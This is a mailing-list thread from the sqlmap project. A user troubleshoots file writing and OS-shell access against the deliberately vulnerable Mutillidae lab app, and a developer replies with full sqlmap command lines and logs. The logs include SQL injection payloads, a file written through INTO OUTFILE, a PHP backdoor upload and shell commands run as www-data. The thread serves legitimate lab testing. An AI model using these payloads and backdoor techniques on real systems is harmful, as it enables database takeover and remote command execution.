Hi Chris, Please, provide sqlmap with:
--data "view_user_name=admin&password=adminpass&Submit_button=Submit" By invalid I mean, a view_user_name (perhaps in your version of mutillidae it's called username) value which is accepted as well as a valid password in this case. Cheers, Bernardo On 7 July 2011 11:37, Chris Oakley <christopher.oak...@gmail.com> wrote: > Hi Bernardo > > I'm not sure what you mean when you say that the POST parameters are > invalid. I tried the following: > > C:\Program Files\sqlmap-0.9>python sqlmap.py -u "http://localhost/muti > llidae/index.php?page=user-info.php" --data "username=foo&password=bar > &user-info-php-submit-button=View+Account+details" -p "username" --os-shell > > and the following occurs: > > [11:31:47] [INFO] the back-end DBMS is MySQL > web server operating system: Windows > web application technology: PHP 5.3.5, Apache 2.2.17 > back-end DBMS: MySQL 5.0 > [11:31:47] [INFO] going to use a web backdoor for command prompt > [11:31:47] [INFO] fingerprinting the back-end DBMS operating system > [11:31:48] [INFO] the back-end DBMS operating system is Windows > [11:31:48] [INFO] trying to upload the file stager > which web application language does the web server support? > [1] ASP > [2] ASPX > [3] PHP (default) > [4] JSP >> > [11:31:49] [WARNING] unable to retrieve the web server document root > please provide the web server document root [C:/xampp/htdocs/,C:/Inetp > ub/wwwroot/]: C:\wamp\www\mutillidae > [11:32:01] [WARNING] unable to retrieve any web server path > please provide any additional web server full path to try to upload th > e agent [Enter for None]: C:\wamp\www\mutillidae > [11:32:07] [WARNING] unable to upload the file stager on 'C:/wamp/www/ > mutillidae' > [11:32:08] [WARNING] unable to upload the file stager on 'C:/wamp/www/ > mutillidae/mutillidae' > [11:32:08] [WARNING] HTTP error codes detected during testing: > 404 (Not Found) - 2 times > [11:32:08] [INFO] Fetched data logged to text files under 'C:\Program > Files\sqlmap-0.9\output\localhost' > > [*] shutting down at 11:32:08 > > Could it be to do with: > > [11:31:49] [WARNING] unable to retrieve the web server document root > please provide the web server document root [C:/xampp/htdocs/,C:/Inetp > ub/wwwroot/]: C:\wamp\www\mutillidae > [11:32:01] [WARNING] unable to retrieve any web server path > please provide any additional web server full path to try to upload th > e agent [Enter for None]: C:\wamp\www\mutillidae > > Regards > > Chris > > On 6 July 2011 23:52, Bernardo Damele A. G. <bernardo.dam...@gmail.com> > wrote: >> >> Hi Chris, >> >> No worries. >> If you want command execution, sqlmap can handle it automatically also >> when it's MySQL and you've got a writable folder within the document >> root, --os-cmd and --os-shell. Also, --os-pwn can work in this >> scenario too. >> The file stager uploaded is 0KB because you provide invalid values to >> the POST parameters. sqlmap uses the LIMIT 1 INTO OUTFILE trick to >> upload the file stager against MySQL. >> >> See: >> --8<-- >> $ python sqlmap.py -u >> "http://debian32/mutillidae/index.php?page=user-info.php"; --data >> "view_user_name=admin&password=adminpass&Submit_button=Submit" -v 1 >> --os-shell --flush-session >> >> sqlmap/1.0-dev (r4217) - automatic SQL injection and database takeover >> tool >> http://sqlmap.sourceforge.net >> >> [!] legal disclaimer: usage of sqlmap for attacking targets without >> prior mutual consent is illegal. It is the end user's responsibility >> to obey all applicable local, state and federal laws. Authors assume >> no liability and are not responsible for any misuse or damage caused >> by this program >> >> [*] starting at 23:49:52 >> >> [23:49:52] [INFO] setting file for logging HTTP traffic >> [23:49:52] [INFO] using >> >> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' >> as session file >> [23:49:52] [INFO] flushing session file >> [23:49:52] [INFO] testing connection to the target url >> [23:49:52] [INFO] heuristics detected web page charset 'ascii' >> [23:49:52] [INFO] testing if the url is stable, wait a few seconds >> [23:49:53] [INFO] url is stable >> [23:49:53] [INFO] testing if POST parameter 'view_user_name' is dynamic >> [23:49:53] [WARNING] POST parameter 'view_user_name' appears to be not >> dynamic >> [23:49:53] [INFO] heuristic test shows that POST parameter >> 'view_user_name' might be injectable (possible DBMS: MySQL) >> [23:49:53] [INFO] testing sql injection on POST parameter 'view_user_name' >> [23:49:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >> clause' >> [23:49:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or >> HAVING clause' >> [23:49:54] [INFO] POST parameter 'view_user_name' is 'MySQL >= 5.0 AND >> error-based - WHERE or HAVING clause' injectable >> [23:49:54] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> [23:49:54] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >> [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL > 5.0.11 >> AND time-based blind' injectable >> [23:50:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> [23:50:04] [INFO] target url appears to be UNION injectable with 4 columns >> [23:50:04] [INFO] POST parameter 'view_user_name' is 'MySQL UNION >> query (NULL) - 1 to 10 columns' injectable >> POST parameter 'view_user_name' is vulnerable. Do you want to keep >> testing the others? [y/N] >> sqlmap identified the following injection points with a total of 30 >> HTTP(s) requests: >> --- >> Place: POST >> Parameter: view_user_name >> Type: error-based >> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause >> Payload: view_user_name=admin' AND (SELECT 3033 FROM(SELECT >> COUNT(*),CONCAT(CHAR(58,108,114,100,58),(SELECT (CASE WHEN (3033=3033) >> THEN 1 ELSE 0 END)),CHAR(58,116,116,115,58),FLOOR(RAND(0)*2))x FROM >> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND >> 'ekpw'='ekpw&password=adminpass&Submit_button=Submit >> >> Type: UNION query >> Title: MySQL UNION query (NULL) - 1 to 10 columns >> Payload: view_user_name=admin' UNION ALL SELECT NULL, NULL, >> >> CONCAT(CHAR(58,108,114,100,58),IFNULL(CAST(CHAR(67,69,82,68,112,104,67,118,70,113) >> AS CHAR),CHAR(32)),CHAR(58,116,116,115,58)), NULL# AND >> 'TOwv'='TOwv&password=adminpass&Submit_button=Submit >> >> Type: AND/OR time-based blind >> Title: MySQL > 5.0.11 AND time-based blind >> Payload: view_user_name=admin' AND SLEEP(5) AND >> 'BfoH'='BfoH&password=adminpass&Submit_button=Submit >> --- >> >> [23:51:31] [INFO] the back-end DBMS is MySQL >> >> web application technology: PHP 5.2.6, Apache 2.2.9 >> back-end DBMS: MySQL 5.0 >> [23:51:31] [INFO] going to use a web backdoor for command prompt >> [23:51:31] [INFO] fingerprinting the back-end DBMS operating system >> [23:51:31] [INFO] the back-end DBMS operating system is Linux >> [23:51:31] [INFO] trying to upload the file stager >> which web application language does the web server support? >> [1] ASP >> [2] ASPX >> [3] PHP (default) >> [4] JSP >> > >> [23:51:32] [WARNING] unable to retrieve the web server document root >> please provide the web server document root [/var/www/]: >> [23:51:32] [WARNING] unable to retrieve any web server path >> please provide any additional web server full path to try to upload >> the agent [Enter for None]: /var/www/test >> [23:51:35] [WARNING] unable to upload the file stager on '/var/www' >> [23:51:35] [INFO] the file stager has been successfully uploaded on >> '/var/www/test' - http://debian32:80/test/tmpugbmo.php >> [23:51:35] [INFO] the backdoor has probably been successfully uploaded >> on '/var/www/test' - http://debian32:80/test/tmpbnhpd.php >> [23:51:35] [INFO] calling OS shell. To quit type 'x' or 'q' and press >> ENTER >> os-shell> id >> do you want to retrieve the command standard output? [Y/n/a] >> command standard output: 'uid=33(www-data) gid=33(www-data) >> groups=33(www-data)' >> >> os-shell> pwd >> do you want to retrieve the command standard output? [Y/n/a] >> command standard output: '/var/www/test' >> >> os-shell> exit >> [23:51:44] [WARNING] HTTP error codes detected during testing: >> 404 (Not Found) - 1 times >> [23:51:44] [INFO] Fetched data logged to text files under >> '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32' >> >> [*] shutting down at 23:51:44 >> --8<-- >> >> Cheers, >> Bernardo >> >> >> On 6 July 2011 23:46, <christopher.oak...@gmail.com> wrote: >> > Hi >> > >> > Thanks. It turns out I was being an idiot. With absolute paths I didn't >> > realise that this also includes the destination file name. With that >> > included, it works like a dream. >> > >> > What I haven't managed to get going properly yet is the --os-cmd flag. >> > The temp stager file does appear, but is empty, 0KB. However; I think I'll >> > save that one for another day! >> > >> > Regards >> > >> > Chris >> > ------------------ >> > >> > -----Original Message----- >> > From: "Bernardo Damele A. G." <bernardo.dam...@gmail.com> >> > Date: Wed, 6 Jul 2011 23:42:22 >> > To: Chris Oakley<christopher.oak...@gmail.com> >> > Cc: <sqlmap-users@lists.sourceforge.net> >> > Subject: Re: [sqlmap-users] File Writing >> > >> > Hi Chris, >> > >> > To me it works well: >> > --8<-- >> > $ python sqlmap.py -u >> > "http://debian32/mutillidae/index.php?page=user-info.php"; --forms -p >> > view_user_name --risk 3 --level 3 --parse-errors --file-write >> > /etc/passwd --file-dest /tmp/test --flush-session >> > >> > sqlmap/1.0-dev (r4217) - automatic SQL injection and database >> > takeover tool >> > http://sqlmap.sourceforge.net >> > >> > [!] legal disclaimer: usage of sqlmap for attacking targets without >> > prior mutual consent is illegal. It is the end user's responsibility >> > to obey all applicable local, state and federal laws. Authors assume >> > no liability and are not responsible for any misuse or damage caused >> > by this program >> > >> > [*] starting at 23:26:35 >> > >> > [23:26:35] [INFO] setting file for logging HTTP traffic >> > [23:26:35] [INFO] testing connection to the target url >> > [23:26:35] [INFO] heuristics detected web page charset 'ascii' >> > [23:26:35] [INFO] searching for forms >> > [#1] form: >> > POST http://debian32:80/mutillidae/index.php?page=user-info.php >> > POST data: view_user_name=&password=&Submit_button=Submit >> > do you want to test this form? [Y/n/q] >> >> >> > Edit POST data [default: >> > view_user_name=&password=&Submit_button=Submit] (Warning: blank fields >> > detected): >> > do you want to fill blank fields with random values? [Y/n] >> > [23:26:37] [WARNING] the testable parameter 'view_user_name' you >> > provided is not inside the GET >> > [23:26:37] [INFO] using >> > >> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/debian32/session' >> > as session file >> > [23:26:37] [INFO] flushing session file >> > [23:26:37] [INFO] using >> > >> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' >> > as results file >> > [23:26:37] [INFO] heuristics detected web page charset 'ascii' >> > [23:26:37] [INFO] testing if the url is stable, wait a few seconds >> > [23:26:38] [INFO] url is stable >> > [23:26:38] [INFO] heuristic test shows that POST parameter >> > 'view_user_name' might be injectable (possible DBMS: MySQL) >> > [23:26:38] [INFO] testing sql injection on POST parameter >> > 'view_user_name' >> > [23:26:38] [INFO] testing 'AND boolean-based blind - WHERE or HAVING >> > clause' >> > [23:26:40] [INFO] testing 'OR boolean-based blind - WHERE or HAVING >> > clause' >> > [23:26:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING >> > clause (Generic comment)' >> > [23:26:42] [INFO] POST parameter 'view_user_name' is 'OR boolean-based >> > blind - WHERE or HAVING clause (Generic comment)' injectable >> > [23:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or >> > HAVING clause' >> > [23:26:42] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or >> > HAVING clause' >> > [23:26:42] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING >> > clause' >> > [23:26:42] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING >> > clause' >> > [23:26:42] [INFO] testing 'MySQL OR error-based - WHERE or HAVING >> > clause' >> > [23:26:42] [INFO] POST parameter 'view_user_name' is 'MySQL OR >> > error-based - WHERE or HAVING clause' injectable >> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 stacked queries' >> > [23:26:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' >> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' >> > [23:26:42] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy >> > query)' >> > [23:26:42] [INFO] testing 'MySQL > 5.0.11 OR time-based blind' >> > [23:26:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' >> > [23:26:43] [INFO] target url appears to be UNION injectable with 4 >> > columns >> > [23:26:43] [INFO] POST parameter 'view_user_name' is 'MySQL UNION >> > query (NULL) - 1 to 10 columns' injectable >> > [23:26:43] [WARNING] in OR boolean-based injections, please consider >> > usage of switch --drop-set-cookie if you experience any problems >> > during data retrieval >> > POST parameter 'view_user_name' is vulnerable. Do you want to keep >> > testing the others? [y/N] >> > sqlmap identified the following injection points with a total of 148 >> > HTTP(s) requests: >> > --- >> > Place: POST >> > Parameter: view_user_name >> > Type: boolean-based blind >> > Title: OR boolean-based blind - WHERE or HAVING clause (Generic >> > comment) >> > Payload: view_user_name=-5244' OR NOT (1884=1884)-- >> > &password=bDXj&Submit_button=Submit >> > >> > Type: error-based >> > Title: MySQL OR error-based - WHERE or HAVING clause >> > Payload: view_user_name=-3024' OR 1 GROUP BY >> > CONCAT(CHAR(58,97,108,119,58),(SELECT (CASE WHEN (8877=8877) THEN 1 >> > ELSE 0 END)),CHAR(58,112,119,98,58),FLOOR(RAND(0)*2)) HAVING MIN(0)-- >> > &password=bDXj&Submit_button=Submit >> > >> > Type: UNION query >> > Title: MySQL UNION query (NULL) - 1 to 10 columns >> > Payload: view_user_name=IZBb' UNION ALL SELECT NULL, >> > >> > CONCAT(CHAR(58,97,108,119,58),IFNULL(CAST(CHAR(121,74,77,117,83,105,112,118,99,84) >> > AS CHAR),CHAR(32)),CHAR(58,112,119,98,58)), NULL, >> > NULL#&password=bDXj&Submit_button=Submit >> > --- >> > >> > do you want to exploit this SQL injection? [Y/n] >> > [23:26:46] [INFO] testing MySQL >> > [23:26:46] [INFO] confirming MySQL >> > [23:26:46] [INFO] the back-end DBMS is MySQL >> > >> > web application technology: PHP 5.2.6, Apache 2.2.9 >> > back-end DBMS: MySQL >= 5.0.0 >> > [23:26:46] [INFO] fingerprinting the back-end DBMS operating system >> > [23:26:46] [INFO] the back-end DBMS operating system is Linux >> > [23:26:46] [WARNING] if the problem persists with 'None' values please >> > try to use hidden switch --no-cast (fixing problems with some >> > collation issues) >> > do you want confirmation that the file '/tmp/test' has been >> > successfully written on the back-end DBMS file system? [Y/n] >> > [23:26:48] [INFO] the file has been successfully written and its size >> > is 1848 bytes, but the size differs from the local file '/etc/passwd' >> > (1845 bytes) >> > [23:26:48] [WARNING] expect junk characters inside the file as a >> > leftover from UNION query >> > [23:26:48] [INFO] you can find results of scanning in multiple targets >> > mode inside the CSV file >> > >> > '/home/bernardo/software/sqlmap/subversion/trunk/sqlmap/output/results-07062011_1126pm.csv' >> > >> > [*] shutting down at 23:26:48 >> > --8<-- >> > >> > Cheers, >> > Bernardo >> > >> > >> > On 3 July 2011 18:03, Chris Oakley <christopher.oak...@gmail.com> wrote: >> >> Hi >> >> >> >> I'm playing with file writing. I have a full privs root user set up in >> >> mysql and am using >> >> >> >> http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10 >> >> to play with. I've set up a /temp folder below the web root of the >> >> app. >> >> I've put a file "evil.php" in the sqlmap working directory. I've also >> >> changed the permissions for all users on the temp folder to write >> >> access >> >> allowed. >> >> >> >> I'm using the following input to try and upload this file: >> >> >> >> C:\Program Files\sqlmap-0.9>python sqlmap.py -u >> >> "http://localhost/mutillidae/ind >> >> ex.php?page=user-info.php" --data >> >> "username=&password=&user-info-php-submit-butt >> >> on=View+Account+Details" -p "username" --proxy "http://127.0.0.1:8085"; >> >> --file-wr >> >> ite "evil.php" --file-dest "temp/evil.php" >> >> >> >> This is with the latest dev build by the way. >> >> >> >> The output I get is: >> >> >> >> [18:00:03] [INFO] the back-end DBMS is MySQL >> >> web server operating system: Windows >> >> web application technology: PHP 5.3.5, Apache 2.2.17 >> >> back-end DBMS: MySQL 5.0 >> >> [18:00:03] [INFO] fingerprinting the back-end DBMS operating system >> >> [18:00:03] [INFO] the back-end DBMS operating system is Windows >> >> [18:00:04] [WARNING] if the problem persists with 'None' values please >> >> try >> >> to us >> >> e hidden switch --no-cast (fixing problems with some collation issues) >> >> do you want confirmation that the file 'temp/evil.php' has been >> >> successfully >> >> wri >> >> tten on the back-end DBMS file system? [Y/n] >> >> [18:00:12] [WARNING] it looks like the file has not been written, this >> >> can >> >> occur >> >> if the DBMS process' user has no write privileges in the destination >> >> path >> >> [18:00:12] [WARNING] expect junk characters inside the file as a >> >> leftover >> >> from U >> >> NION query >> >> [18:00:12] [INFO] Fetched data logged to text files under 'C:\Program >> >> Files\sqlm >> >> ap-0.9\output\localhost' >> >> >> >> [*] shutting down at 18:00:12 >> >> >> >> and sure enough the file isn't written. I've also tried using the >> >> --no-cast >> >> switch, to no avail. >> >> >> >> Does anyone have any ideas on what could be going wrong here? I can >> >> use the >> >> --file-read switch to read any file such as C:\boot.ini. The --os-cmd >> >> and >> >> --os-pwn commands also fail at the stager upload phase, probably for >> >> similar >> >> reasons. >> >> >> >> Any help would be appreciated >> >> >> >> Cheers >> >> >> >> Chris >> >> >> >> >> >> >> >> ------------------------------------------------------------------------------ >> >> All of the data generated in your IT infrastructure is seriously >> >> valuable. >> >> Why? It contains a definitive record of application performance, >> >> security >> >> threats, fraudulent activity, and more. Splunk takes this data and >> >> makes >> >> sense of it. IT sense. And common sense. >> >> http://p.sf.net/sfu/splunk-d2d-c2 >> >>_______________________________________________ >> >> sqlmap-users mailing list >> >> sqlmap-users@lists.sourceforge.net >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> >> > >> > >> > >> > -- >> > Bernardo Damele A. G. >> > >> > E-mail / Jabber: bernardo.damele (at) gmail.com >> > Mobile: +447788962949 (UK 07788962949) >> > PGP Key ID: Unavailable >> > >> >> >> >> -- >> Bernardo Damele A. G. >> >> E-mail / Jabber: bernardo.damele (at) gmail.com >> Mobile: +447788962949 (UK 07788962949) >> PGP Key ID: Unavailable > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable ------------------------------------------------------------------------------ All of the data generated in your IT infrastructure is seriously valuable. Why? It contains a definitive record of application performance, security threats, fraudulent activity, and more. Splunk takes this data and makes sense of it. IT sense. And common sense. http://p.sf.net/sfu/splunk-d2d-c2 _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
